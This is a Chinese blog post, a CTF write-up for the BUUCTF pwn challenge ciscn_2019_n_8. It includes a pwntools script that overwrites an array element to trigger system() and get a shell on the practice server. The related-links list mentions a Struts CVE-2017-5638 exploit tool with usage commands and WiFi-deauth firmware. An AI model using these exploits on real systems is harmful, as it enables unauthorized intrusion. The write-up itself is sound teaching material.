pwn刷题num27-----内存地址覆盖修改数组元素值

最新推荐文章于 2024-11-09 19:45:52 发布
最新推荐文章于 2024-11-09 19:45:52 发布
阅读量772 收藏
点赞数
分类专栏: BUUCTF pwn CTF 文章标签: 系统安全 c语言 安全 python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124457179
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-ciscn_2019_n_8在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行在这里插入图片描述

32位程序,小端序
开启部分RELRO-----got表可写
开启canary保护-----栈溢出需绕过
开启NX保护-----堆栈不可执行
开启PIE-----内存地址随机化
动态链接

ida一下看一下主函数
在这里插入图片描述
先是用一个scanf输入一个name,存在var里,之后观察这个if语句,var[13]只要为17(0x11)就可以调用system函数,获得shell
exp

from pwn import *
context(endian='little',os='linux',arch='i386',log_level='debug') #小端序,linux系统,32位架构,debug
sh = remote('node4.buuoj.cn',25777)
payload = flat(['a' * 13 * 4,0x11])  #32位程序,每个数组元素占4字节,先将var[0]到var[12]填为a,之后将var[13]填为17(0x11)
sh.sendline(payload)
sh.interactive()

运行获得shell

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
专栏目录
CTF-PWN练习之返回地址覆盖
ChuMeng1999的博客
01-05 884
目录预备知识一、相关实验二、函数调用约定三、基本的缓冲区溢出攻击模型实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF-PWN练习》、《CTF-PWN练习之精确覆盖变量数据》、《CTF PWN练习之函数指针改写》等试验。 二、函数调用约定 函数调用约定描述了函数传递参数的方式和栈协同工作的技术细节,不同的函数调用约定原理基本相同,但在细节上是有差别的,包括函数参数的传递方式、参数的入栈顺序、函数返回时由谁来平
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4372
BUUCTF刷题记录
pwn刷题num16----寻找地址间距,栈溢出覆盖返回地址
tbsqigongzi的博客
04-23 828
攻防世界pwn进阶区stack2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行程序,先输入数字总量,之后输入数字,会有一个菜单栏,分别实现对数字展示,添加,改变,取平均,和退出程序五种功能。 ida看一下主函数 观察主函数,发现一处溢出数组越界漏洞,v5没有限制大小,使得
PWN入门(4)覆盖程序函数的返回地址
Ba1_Ma0的博客
09-09 1111
有什么不会或者是错误的地方的可以私信我,看到必回。
PWN入门之数组越界
weixin_44681716的博客
05-04 2496
实验目的 利用数组越界的特性,去填充不能利用栈溢出的方法去覆盖。 通过这次实验,使我们掌握利用数组越界去继续泄露的方法。 实验文件 链接:https://pan.baidu.com/s/1tLyKYjdLXjLKjRHoivhYnQ 提取码:m6ra 我们主要通过2019年4月信息安全国赛的you_pwn来介绍一下怎么去利用数组越界。 实验步骤 首先介绍一下数组越界的原理: 数组越界分两种:一...
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]
九层台
04-25 1827
0x01your_pwn Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开的栈地址任意写 v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读写一...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn——20180831
原味瓜子、的博客
09-01 1071
Get a shell , come on ! 目:https://pan.baidu.com/s/1dTE2MxfBvVYTS0MhJwj_vw 提取码:7wbc 工具: 解: 1、首先file stack_3一下,32位的,gdb ./stack_3一下,run一下,输入即报错。 用ida打开,点进main函数,f5编译一下,读一下吧。 2、 int __cdecl mai...
pwn】学pwn日记(栈学习)(随缘更新)
woodwhale的博客
08-04 5463
pwn】学pwn日记(持续更新) 前言 从8.2开始系统性学习pwn,在此之前,学习了部分汇编指令以及32位c语言程序的堆栈图及函数调用。 文章中的部分图片来自于教学视频 学习视频链接:XMCVE 2020 CTF Pwn入门课程、【星盟安全PWN系列教程(持续更新) 学习文章链接: CTF Wiki elf文件 未初始化的全局变量glb,编译出来在内存中bss中 初始化的全局变量str(没有被修改过),编译出来在内存中data 而hello world在text段中 main和sum
地址的更改
编程技巧分享
03-09 3086
地址代表着一个容器,在知道了这个地址的情况下,我们可以改变这个容器中盛放的常量。main函数参数的用法。
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1232
CISCN2021pwn pwny(数组越界,劫持exit_hook)
32数组溢出怎么解决_从0开始CTFPWN(二)从PWN的HelloWorld栈溢出开始
weixin_42524792的博客
01-09 365
本文为看雪论优秀文章看雪论坛作者ID:dxbaicai一、教程说明上一篇中我们介绍了PWN的基础环境:从0开始CTF-PWN(一)——基础环境准备https://bbs.pediy.com/thread-259199.htm本篇会从PWN的HelloWorld——栈溢出漏洞开始,进行新手教程,由于我也是刚学习,所以理解上也是从新手的角度出发的,一些理解不到位的地方,恳请各位大神指正,我会...
pwn 练习笔记 覆盖内存地址
SsMing的博客
09-02 1471
目录   覆盖内存地址  protostar stack2 protostar format3 ssh copy文件报错 覆盖内存地址 根据ctfwiki学习 小于机器字长的数字,因为之前覆盖的方法把地址放在最前面,所以覆盖后,最小也是4,如果是小于4的数字 可以把地址放在后面 覆盖大数字,构造通用函数如下: def fmt(prev, word, index):   ...
PWN练习之精确覆盖变量数据
WateranFire的博客
09-05 1298
做合天上这一节时,有一个汇编上关于main函数参数的问。 一般在进入函数后,首先执行push ebp;mov ebp,esp; 此时EBP指向的区域数据内容是这样的(从上到下由低位向高位) 原EBP        (EBP指向此处) 返回地址 argc argv   所以此后提到argc时,用[EBP+8]表示,提到argv
C++设计模式结构型模式———代理模式
最新发布
无敌岩雀的博客
11-09 1125
代理模式的使用方式有很多,延迟初始化 (虚拟代理)。如果有一个偶尔使用的重量级服务对象, 一直保持该对象运行会消耗系统资源时, 可使用代理模式。无需在程序启动时就创建该对象, 可将对象的初始化延迟到真正有需要的时候。访问控制:如果你只希望特定客户端使用服务对象, 这里的对象可以是操作系统中非常重要的部分, 而客户端则是各种已启动的程序 (包括恶意程序), 此时可使用代理模式。代理可仅在客户端凭据满足要求时将请求传递给服务对象。代理模式和装饰模式有类似之处,但是这两个模式要解决的问不同或者说立场不同。
(蓝桥杯C/C++)——基础算法(下)
2402_82385099的博客
11-07 3881
概念:递归是指函数直接或间接调用自身的过程。基本情况(递归终止条件):递归函数中的一个条件,当满足该条件时,递归终止,避免无限递归。可以理解为直接解决极小规模问的方法。递归表达式(递归调用):递归函数中的语句,用于解决规模更小的子问,再将子问的答案合井成为当前问的答案。枚举算法是一种基本的算法思想,它通过穷举所有可能的情况来解决问。它的基本思想是将问的解空间中的每个可能的解都枚举出来,并进行验证和比较,找到满足问条件的最优解或者所有解。枚举算法适用于问规模较小、解空间可穷举的情况。
Struts-Pwn工具:探测和利用Apache Struts CVE-2017-5638漏洞
资源摘要信息:"struts-pwn:Apache Struts CVE-2017-5638的漏洞利用" ### 知识点详解 #### Apache Struts简介 Apache Struts是一个开源的Java EE框架,用于构建基于MVC(模型-视图-控制器)模式的Web应用程序。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值